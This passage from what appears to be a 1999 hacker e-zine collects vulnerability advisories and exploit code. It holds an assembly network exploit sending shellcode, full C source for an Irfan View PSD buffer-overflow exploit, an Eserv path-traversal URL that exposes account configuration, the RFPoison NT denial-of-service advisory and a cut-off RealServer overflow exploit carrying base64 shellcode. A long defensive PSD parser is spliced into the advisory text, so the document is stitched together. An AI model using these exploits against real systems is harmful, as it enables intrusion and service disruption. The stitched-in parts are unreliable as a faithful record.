    push noportl
    push offset noport
    call write_console
    jmp quit3
@@2:
    lea edi, _port
    call parse
    or ecx, ecx
    jnz @@3
    push no_port2l
    push offset no_port2
    call write_console
    jmp quit3
@@3:
    push ecx
    lea edi, _port2
    call parse
    cmp dword ptr [esi], "32.3"
    jz ver1
    cmp word ptr [esi+1], "3."
    jz ver2
    push verzionl
    push offset verzion
    call write_console
    jmp quit3
ver1:
    inc version
ver2:
    push offset wsadata
    push 0101h
    call WSAStartup
    or eax, eax
    jz winsock_found
    push errorinitl
    push offset errorinit
    call write_console
    jmp quit3
winsock_found:
    xor eax, eax
    push eax
    inc eax
    push eax
    inc eax
    push eax
    call socket
    cmp eax, -1
    jnz socket_ok
    push sockerrl
    push offset sockerr
    call write_console
    jmp quit2
socket_ok:
    mov sock, eax
    mov sin.sin_family, 2
    mov ebx, offset _port
    call str2num
    mov eax, edx
    push eax
    call htons
    mov sin.sin_port, ax
    mov ebx, offset _port2
    call str2num
    mov eax, edx
    push eax
    call htons
    xor ax, 09999h
    mov store, ax
    mov store2, ax
    mov esi, offset _host
lewp:
    xor al, al
    lodsb
    cmp al, 039h
    ja gethost
    test al, al
    jnz lewp
    push offset _host
    call inet_addr
    cmp eax, -1
    jnz ip_aight
    push ipilll
    push offset ipill
    call write_console
    jmp quit1
ip_aight:
    mov sin.sin_addr, eax
    jmp continue
gethost:
    push offset _host
    call gethostbyname
    test eax, eax
    jnz gothost
    push reshostl
    push offset reshost
    call write_console
    jmp quit1
gothost:
    mov eax, [eax+0ch]
    mov eax, [eax]
    mov eax, [eax]
    mov sin.sin_addr, eax
continue:
    push size sin
    push offset sin
    push sock
    call connect
    or eax, eax
    jz connect_ok
    push cnerrorl
    push offset cnerror
    call write_console
    jmp quit1
connect_ok:
    push respl
    push offset response
    call write_console
    xor eax, eax
    push eax
    push 1000
    push offset buffer
    push sock
    call recv
    or eax, eax
    jg sveet
    push derrorl
    push offset derror
    call write_console
    jmp quit1
sveet:
    push eax
    push offset buffer
    call write_console
    cmp version, 0
    jz shell2
    xor eax, eax
    push eax
    push sploit_length323
    push offset sploit323
    push sock
    jmp blah
shell2:
    xor eax, eax
    push eax
    push sploit_length33
    push offset sploit33
    push sock
blah:
    call send
    push 500
    call Sleep
    push successl
    push offset success
    call write_console
quit1:
    push sock
    call closesocket
quit2:
    call WSACleanup
quit3:
    push 0
    call ExitProcess

parse proc                      ; cheap parsing..
lewp9:
    xor eax, eax
    cld
    lodsb
    cmp al, 20h
    jz done
    test al, al
    jz done2
    stosb
    dec ecx
    jmp lewp9
done:
    dec ecx
done2:
    ret
endp

str2num proc
    push eax ecx edi
    xor eax, eax
    xor ecx, ecx
    xor edx, edx
    xor edi, edi
lewp2:
    xor al, al
    xlat
    test al, al
    jz end_it
    sub al, 030h
    mov cl, al
    mov eax, edx
    mul numbase
    add eax, ecx
    mov edx, eax
    inc ebx
    inc edi
    cmp edi, 0ah
    jnz lewp2
end_it:
    pop edi ecx eax
    ret
endp

init_console proc
    push -10
    call GetStdHandle
    or eax, eax
    je init_error
    mov [console_in], eax
    push -11
    call GetStdHandle
    or eax, eax
    je init_error
    mov [console_out], eax
    ret
init_error:
    push 0
    call ExitProcess
endp

write_console proc text_out:dword, text_len:dword
    pusha
    push 0
    push offset bytes_read
    push text_len
    push text_out
    push console_out
    call WriteConsoleA
    popa
    ret
endp

end start

knight, siezer, oeb, lusta, infidel, devious, werd to #9x #darkcyde #phunc #b4b0 #2600 #2600-uk & wErd to D4RKCYDE.

@HWA

46.0 The Xnews guid
~~~~~~~~~~~~~~~~~~~

From the home page http://xnews.3dnews.net/

All the talk about the PIII's ID code and Win98's Global Unique ID reminds me of Xnews' own IDToken. From the manual:

This is a string Xnews embeds in Message-ID in order to track your posts and alert you to replies to your articles. You can use any string of letters and numbers. I use my email without the @ and the . : luutrangeocities.
The idea is to use a string that no one else is likely to use. By default, I generate this string by taking your email address and stripping out the . and @. In retrospect, maybe this was not such a good idea, as some users who go to great lengths to hide their email may not appreciate having it embedded inside Message-ID and References headers (albeit in an altered form). But you can change this to anything you like, including a seemingly random string of letters and numbers. And if you're really paranoid, just delete it (use an empty string). You'll lose the convenience of having Xnews flag replies to your posts, of course.

[By the way, if your news server does not accept client-generated message ids, this entire discussion is moot.]

Anyway, I just want Xnews users to be aware of this issue. I don't want people to be caught by surprise and then flame me. This is really a feature designed to help you, not some lame corporate attempt to track you for marketing purposes.

@HWA

47.0 BUFFER OVERFLOW IN IMG VIEWER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ, Monday 6th November 1999, 11:02 pm CET

The popular image viewer "Irfan View32" contains a buffer overflow problem in its handling of Adobe Photoshop image files. Irfan View checks the image type by the image header; if the "8BPS" pattern is found in the header, Irfan View judges the file to be a Photoshop image. The overflow happens in the handling of reading this marker. Cool one, isn't it :).

Link: Packet Storm http://packetstorm.securify.com/9911-exploits/irfan.view32.txt

The popular image viewer "Irfan View32" contains a buffer overflow problem in its handling of Adobe Photoshop image files. Irfan View checks the image type by the image header; if the "8BPS" pattern is found in the header, Irfan View judges the file to be a Photoshop image. We think the overflow happens in the handling of reading this marker.
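The overflow described above sits in the code path that recognises the "8BPS" marker. As an added example (not the advisory's code and not Irfan View's), here is how a viewer can identify a Photoshop file without trusting it: the parser never reads past the bytes it was given, range-checks every header field before using it, and refuses any dimensions whose pixel-buffer size would not fit in memory. The 26-byte header layout is Adobe's documented PSD format; the sample inputs are constructed for the demonstration.

```c
/* Bounds-checked recognition of a Photoshop (PSD) header (added example; the 26-byte
 * header layout is Adobe's documented PSD format, the sample inputs are constructed). */
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define PSD_MAGIC      "8BPS"
#define PSD_HEADER_LEN 26u      /* signature + 22 bytes of fixed fields */
#define PSD_MAX_DIM    30000u   /* Photoshop's width/height limit for version-1 files */

typedef struct {
    uint16_t version, channels, depth, color_mode;
    uint32_t height, width;
} psd_header;

enum psd_status {
    PSD_OK = 0,
    PSD_NOT_PSD,    /* no "8BPS" signature: not this format, try another decoder */
    PSD_TRUNCATED,  /* signature present but fewer than 26 bytes were supplied */
    PSD_BAD_FIELD   /* signature present but a header field is out of range */
};

static uint16_t be16(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Reads at most len bytes of buf and range-checks every field before it is used, so the
 * advisory's "8BPS" + long run of 'a' file is reported as PSD_BAD_FIELD, never parsed. */
enum psd_status psd_parse_header(const unsigned char *buf, size_t len, psd_header *out)
{
    psd_header h;
    if (buf == NULL || len < 4 || memcmp(buf, PSD_MAGIC, 4) != 0)
        return PSD_NOT_PSD;
    if (len < PSD_HEADER_LEN)
        return PSD_TRUNCATED;

    h.version    = be16(buf + 4);      /* bytes 6..11 are reserved and must be zero */
    h.channels   = be16(buf + 12);
    h.height     = be32(buf + 14);
    h.width      = be32(buf + 18);
    h.depth      = be16(buf + 22);
    h.color_mode = be16(buf + 24);

    if (h.version != 1 || memcmp(buf + 6, "\0\0\0\0\0\0", 6) != 0)
        return PSD_BAD_FIELD;
    if (h.channels < 1 || h.channels > 56)
        return PSD_BAD_FIELD;
    if (h.height < 1 || h.height > PSD_MAX_DIM || h.width < 1 || h.width > PSD_MAX_DIM)
        return PSD_BAD_FIELD;
    if (h.depth != 1 && h.depth != 8 && h.depth != 16 && h.depth != 32)
        return PSD_BAD_FIELD;
    switch (h.color_mode) {   /* Bitmap, Grayscale, Indexed, RGB, CMYK, Multichannel, Duotone, Lab */
    case 0: case 1: case 2: case 3: case 4: case 7: case 8: case 9: break;
    default: return PSD_BAD_FIELD;
    }
    if (out != NULL) *out = h;
    return PSD_OK;
}

/* Bytes for one uncompressed image.  Returns 0 and leaves *out alone when the product does
 * not fit in size_t, so a hostile header can never under-size an allocation. */
int psd_raw_size(const psd_header *h, size_t *out)
{
    uint64_t bits  = (uint64_t)h->channels * h->height * h->width * h->depth; /* all range-checked */
    uint64_t bytes = (bits + 7) / 8;
    if (bytes != (uint64_t)(size_t)bytes)
        return 0;
    *out = (size_t)bytes;
    return 1;
}

/* Constructed inputs (not files from the advisory): the crash pattern and a sane header. */
static const unsigned char crash_file[] =
    "8BPSaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
static const unsigned char good_file[] = {
    '8', 'B', 'P', 'S', 0x00, 0x01,                 /* signature, version 1 */
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00,             /* reserved */
    0x00, 0x03,                                     /* 3 channels */
    0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x20, /* 16 rows x 32 columns */
    0x00, 0x08, 0x00, 0x03                          /* 8 bits per channel, RGB */
};

enum psd_status check_crash_file(void) { return psd_parse_header(crash_file, sizeof crash_file - 1, NULL); }
enum psd_status check_truncated(void)  { return psd_parse_header(good_file, 10, NULL); }

/* Parses the sane header and returns its raw pixel size: 3 * 16 * 32 * 8 bits = 1536 bytes. */
size_t check_good_file(void)
{
    psd_header h;
    size_t n = 0;
    if (psd_parse_header(good_file, sizeof good_file, &h) != PSD_OK)
        return 0;
    return psd_raw_size(&h, &n) ? n : 0;
}

int main(void)
{
    printf("crash pattern -> status %d (PSD_BAD_FIELD is %d)\n", (int)check_crash_file(), (int)PSD_BAD_FIELD);
    printf("sane header   -> %zu bytes of raw pixel data\n", check_good_file());
    return 0;
}
```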
You can see the GPF dialog box with the following file:

8BPSaaaaaaaaaaaaaa .... long 'a'     #You can make this file with notepad.exe

This overflow is exploitable if the appropriate value is stored in the stack area: any code, such as a virus, trojan or destructive code, stored in the image file can be executed. This means the danger also exists when downloading image files and viewing them. Of course, the same danger may exist in other software, such as movie players and audio players.

We coded the following sample code. It generates a jpg file containing the exploit code, which creates "exp.com" in "c:\" and executes it ("exp.com" is a simple demo program; there is no danger). This has been tested on Japanese Windows 98 only.

---
/*=============================================================================
  Irfan View 3.07 Exploit
  The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#define MAXBUF     0x22e0
#define RETADR     0x31E
#define FAKE_ADR   0x80101010   // Writable buffer pointer
#define JMPESP_ADR 0xbffca4f7   // You have to change this value
                                // for non-Japanese Windows98.
#define HEAD "8BPS\0"

unsigned char exploit_code[300]={
0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00 };

// "exp.com"
unsigned char exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00 };

int GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};
char string_buffer[1000] ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
char filename[100] = "c:\\exp.com";

int main(int argc,char *argv[])
{
    unsigned char buf[MAXBUF+1],l1,l2;   /* +1: buf[MAXBUF] is written as the terminator below */
    unsigned int ip,p1,p2,i;
    FILE *fp;

    if (argc<2){
        printf("usage : %s outputfile\n",argv[0]);
        exit(1);
    }
    memset(buf,0x90,MAXBUF);
    buf[MAXBUF]=0;
    memcpy(buf,HEAD,4);
    ip=JMPESP_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[RETADR+6]=0xeb;
    buf[RETADR+7]=0x04;
    ip=FAKE_ADR;
    buf[RETADR+8 ]=ip&0xff;
    buf[RETADR+9 ]=(ip>>8)&0xff;
    buf[RETADR+10]=(ip>>16)&0xff;
    buf[RETADR+11]=(ip>>24)&0xff;
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x1f]=p1&0xff;
    exploit_code[0x20]=(p1>>8)&0xff;
    exploit_code[0x21]=(p1>>16)&0xff;
    exploit_code[0x22]=(p1>>24)&0xff;
    for (i=0;i<4;i++){
        exploit_code[GetProcAddress_fcp[i]  ]=p2&0xff;
        exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
        exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
        exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
    }
    l1=strlen(filename)+strlen(string_buffer);
    l2=strlen((char *)exploit_data);
    strcat(string_buffer,filename);
    strcat(string_buffer,"_");
    strcat(string_buffer,(char *)exploit_data);
    strcat((char *)exploit_code,string_buffer);
    exploit_code[0x1c] = l1;
    exploit_code[0x6d] = l2;
    exploit_code[0x77] = l1+1;
    memcpy(buf+RETADR+12,exploit_code,strlen((char *)exploit_code));
    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Can not write file '%s'\n",argv[1]);
        exit(1);
    }
    fwrite(buf,1,MAXBUF,fp);
    fclose(fp);
    printf("Done.\n");
    return FALSE;
}
-----

UNYUN
% The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin@backsection.net (webmaster)
% eEye Digital Security Team [ http://www.eEye.com ] unyun@eEye.com

@HWA

48.0 Eserv 2.50 Web interface Server Directory Traversal Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://packetstorm.securify.com/

From owner-news@technotronic.com Thu Nov 4 22:28:55 1999
Date: Thu, 4 Nov 1999 20:42:25 -0600 (CST)
From: Vacuum
To: news@technotronic.com
Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability

---------- Forwarded message ----------
Date: Thu, 4 Nov 1999 18:26:52 -0600
From: owner-news@technotronic.com
To: owner-news@technotronic.com
Subject: BOUNCE news@technotronic.com: Approval required:

>From vacuum@sword.damocles.com Thu Nov 4 18:26:51 1999
From: "Ussr Labs"
To: "TECHNOTRONIC"
Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability
Date: Thu, 4 Nov 1999 21:20:35 -0300

Eserv 2.50 Web interface Server Directory Traversal Vulnerability

Product:
Eserv/2.50 is the complete solution to access the Internet from a LAN:
- Mail Server (SMTP and POP3, with the ability to share one mailbox on the ISP, aliases and mail routing support)
- News Server (NNTP)
- Web Server (with CGI, virtual hosts, virtual directory support, web interface for all servers in the package)
- FTP Server (with virtual directory support)
- Proxy Servers
  * FTP proxy and HTTP caching proxy
  * FTP gate
  * HTTPS proxy
  * Socks5, Socks4 and 4a proxy
  * TCP and UDP port mapping
  * DNS proxy
- Finger Server
- Built-in scheduler and dialer (dial on demand, dialer server for external agents, scheduler for any tasks)

PROBLEM

UssrLabs found an Eserv Web Server Directory Traversal Vulnerability. Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory. There is not much to expand on this one....

Example:
http://127.1:3128/../../../conf/Eserv.ini
to show the whole configuration file, including account names

Vendor Status: not contacted
Vendor Url: http://www.eserv.ru/
Program Url: http://www.eserv.ru/eserv/
Credit: USSRLABS

SOLUTION

Nothing yet.

@HWA

49.0 RFP9906 - RFPoison
~~~~~~~~~~~~~~~~~~~~~~~

From http://packetstorm.securify.com/

From rfp@wiretrip.net Mon Nov 1 09:20:06 1999
Date: Mon, 1 Nov 1999 08:18:50 -0600 (EST)
From: ".rain.forest.puppy."
To: vacuum@technotronic.com, thegnome@nmrc.org
Subject: RFP9906 - RFPoison

--- Advisory RFP9906 ----------------------------- rfp.labs -----------
Windows NT remote denial of service and compromise (RFPoison)
------------------------------ rain forest puppy / rfp@wiretrip.net ---

Table of contents:
- 1. Problem
- 2. Solution
- 3. Where to Get This Weapon of Mass Destruction
- 4. Miscellaneous Updates (Important stuff!)

-----------------------------------------------------------------------
My website has been launched! Up to the minute advisories, tools, (and code fixes...heh) are available from http://www.wiretrip.net/rfp/
-----------------------------------------------------------------------

----[ 1. Problem

Interesting how things go around/come around. Recently Luke Kenneth Casson Leighton posted a message on NTBugtraq in response to SP6 not fixing the LSA denial of service. He states that this problem is essentially "due to marshalling/unmarshalling MSRPC code being unable to cope with a NULL policy handle." He also states that they reported this problem to Microsoft around February 1999.

Well, no, I did not 'rediscover' the LSA denial of service (a la the AEDebug advisory earlier this month). I did, however, discover a different denial of service based out of services.exe.
When sent a specific packet, it's possible to get srvsvc.dll to choke and cause services.exe to reference a bad memory location. For those geeks in the crowd, essentially srvsvc_netrshareenum in srvsvc.dll uses rpcrt4_ndrcomplexstructunmarshall to tweak a string, but it returns a NULL. srvsvc_netrshareenum doesn't check the return value, adds four to the pointer, and passes it up a function stack until finally that memory is read (address 00000004). Blam...Dr. Watson.

So we have another problem due to marshalling/unmarshalling MSRPC code. This was found independently of Luke's info and the LSA vulnerability.

The impact is pretty severe. Services.exe handles named pipes for the system. Once this crashes, everything named-pipe-based goes with it. This means logons, logouts, remote system access (registry, server functions, etc), local server management, IIS, file sharing, etc...all go down the tube. However, the box will, for the most part, appear to function normally on the local side, until you do something involving a named pipe service. The only fix is to reboot...however, the shutdown procedure waits for every (non-existent) service to respond to shutdown, and time out. On a typical box this could cause the full shutdown procedure to push over a half-hour; therefore, a hard reset is most likely needed.

Also, once in a great while the bug will 'survive' during a reset. It may take two reboots to get the system back in order. Strange, yes. How, I'm not sure. But it's happened over a half dozen times across four separate boxes I've tested on.

Now, I'm sure some of you are thinking "well, denial of services suck. How can I own .gov and .mil websites with this?" (hi flipz and fuqrag) Well, let's go back to David LeBlanc's response to RFP9903 (AEDebug advisory). He states, for AEDebug to really be a problem, you have to "make something crash that has higher access rights than you do." He also states "you've got to make a service go down that won't kill the machine."
Bingo, this fits the bill. If we have access to change the AEDebug registry key, we can set what programs to run on crash, set autorun to True, and then crash services.exe. Our programs run as Local_System, the box is still alive (TCP/IP-wise) and usable via netcat and whatnot. A much more useful situation for a denial of service, don't you think?

Also, Eric Schultze has detailed many situations where someone could have access to your AEDebug key. I suggest you read his tidbit. It's posted as document 11 in the knowledge base on my website, available at http://www.wiretrip.net/rfp/

So far, I have been able to use this exploit on NT 4.0 server and workstation, with various levels of SP 1, 3, 5, and 6 service packs installed. I even tried applying SP 5 with the following hotfixes (in the following order): lsareq, ipsrfix, csrssfx, ioctlfx, and igmpfix. I've also tried using the Security Configuration Editor on various different 'secure' system profiles, testing to see if perhaps a registry key affected it. After all modifications, the systems were still susceptible.

HOWEVER, I do have reports of two boxes *NOT* being susceptible. The reason for this, however, is unfound. Information will be released when it is found. If you come across a situation where a box is impervious to the exploit, PLEASE EMAIL ME. I would really appreciate the entire install history of that particular system. Email to rfp@wiretrip.net.

----[ 2. Solution

Well, as previously stated, Luke and ISS informed Microsoft of the LSA vulnerability in February 1999. To be fair, I also reported this exact bug, along with the working exploit, to Microsoft on Oct 25th. Have not heard a word.

So, in the meantime, I can recommend two things:

- Block port 139 on your firewall. This, however, does not stop internal attack.
- Turn off the Server service. While inconvenient, this should be deemed a temporary solution until Microsoft releases a patch.
Just for reference, shutting off the Server service will also shut down the Computer Browser service. Glitch, a fellow Wiretrip member, describes the functions of these services as follows:

SERVER: Used as the key to all server-side NetBIOS applications, this service is somewhat needed. Without this service, some of the administrative tools, such as Server Manager, could not be used. If remote administration is not needed, I highly recommend disabling this service. Contrary to popular belief, this service is NOT needed on a webserver.

COMPUTER BROWSER: The Computer Browser service is a function within Microsoft networking for gathering and distributing resource information. When active on a server, the server will register its name through a NetBIOS broadcast or directly to a WINS server.

So you should note that turning these services off will disable the server from participating in NetBIOS-related functions, including file sharing and remote management. But realistically, how many servers need this? Alternate means of content publishing (for webservers) exist (FTP and -ugh- FrontPage). Of course this leaves the myriad of other services though. I'd be interested to see how MS SQL fares.

It's hoped that between the services.exe and the lsass.exe denial of services, both based on bad RPC code, Microsoft will find this problem worthy of fixing. Now we wait...

----[ 3. Where to Get This Weapon of Mass Destruction

I use this title jokingly. But trust me, I have gone back and forth about the release of this exploit. However, as a proponent of full disclosure, I definitely will release a working exploit. But I do so with conditions:

- I will only release a Windows executable.
- The Windows executable is coded to reboot (NT) or crash (9x) upon successful execution. If you blow something up, you blow up too.
- A few checks keep the program from running if you run in a user context that does not allow the above 'safety features' to work.

But it is a working executable.
I'm hoping this will at least curb the script kiddie activity. Of course, I'm sure this program will be reversed and a new version made within 6 hours of posting--but that's not my problem. This should be more than enough to verify/test the exploit, and I've provided the details of how it works and the solutions necessary for stopping it. The skilled will be able to go off this, and the, well, the abusers will hit the glass ceiling as intended. Thanks to Vacuum for helping me come up with a responsible solution.

Also, I want to make it very clear, before I tell you where to get the executable....

DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.
DO NOT ASK ME FOR SOURCE.

oh, and DO NOT ASK ME FOR SOURCE.

I don't care who you are. All email asking for source will be instantly deleted. I don't care if you send me the secret to life--if it has "p.s. can I get the source?" I will pipe that thing to /dev/null, along with whatever goodies you may have sent me. Don't even joke; you won't get a reply.

Now that that's established, you can download RFPoison.exe from my website (of course) at http://www.wiretrip.net/rfp/

----[ 4. Miscellaneous Updates (Important stuff!)

- whisker 1.2.0 has been released! Includes the ability to bounce scans off of AltaVista (thanks to Philip Stoev). Plus some new feature additions, and new scan scripts, including a comprehensive script for scanning FrontPage (thanks to Sozni).

- flipz and fuqrag have been busy hacking .gov and .mil sites. Turns out they're using a vanilla copy of msadc2.pl. Check out msadc2.pl (their exploit) at my website.

- Zeus Technologies had an outstanding response to RFP9905. In under 12 hours they had a patched version available, and were all-around terrific in their private and public response. As an indication of how they do business, I would recommend Zeus Technologies as a vendor to anyone. Kudos for them.
- technotronic and rfp.labs have teamed up! We're going to combine a couple of resources--starting with the mailing list. Technotronic already puts out some good info on his list...now I'll be giving the same list up to date information on rfp.labs advisories, information, and other various cool info. If you're not on it already, you may consider joining. Signup at www.technotronic.com

- with the (sad?) end of octoberfest, I'm also pleased to see w00w00 take over with 'w00giving'--all through the month of November w00w00 will be releasing some more stuff! You can start looking for the first (of many) advisories today (Nov 1st).

Special greetings to Simple Nomad (and others) on this special day where the wheel finishes its cycle and starts its revolution anew.

--- rain forest puppy / rfp@wiretrip.net ----------- ADM / wiretrip ---
So what if I'm not elite. My mom says I'm special.
--- Advisory RFP9906 ----------------------------- rfp.labs -----------

@HWA

50.0 RealNetworks server buffer overflow exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* RealNetworks RealServer G2 buffer overflow exploit
 *
 * by dark spyrit
 * quick unix port by team teso
 *
 * the windows binary is available at http://www.beavuh.org.
 *
 * This exploits a buffer overflow in RealServers web authentication on
 * the administrator port - hence the reason the shellcode is base64 encoded.
 * This has been tested on the NT version with a default installation.
 * If RealServer is installed in a different directory than the default, the
 * buffer will need to be adjusted accordingly.
* The administrator port is randomly selected at installation, but as you'll * only be testing on your own networks this won't matter :) */ #include #include #include #include #include #include #include #include #include #include #include #include /* local functions */ unsigned long int net_resolve (char *host); int net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, int sec); unsigned char sploit[] = "GET /admin/index.html HTTP/1.0\x0d\x0a" "Connection: Keep-Alive\x0d\x0a" "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)\x0d\x0a" "Host: 111.111.11.1:1111\x0d\x0a" "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\x0d\x0a" "Accept-Language: en\x0d\x0a" "Accept-Charset: iso-8859-1,*,utf-8\x0d\x0a" "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk" "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC" 
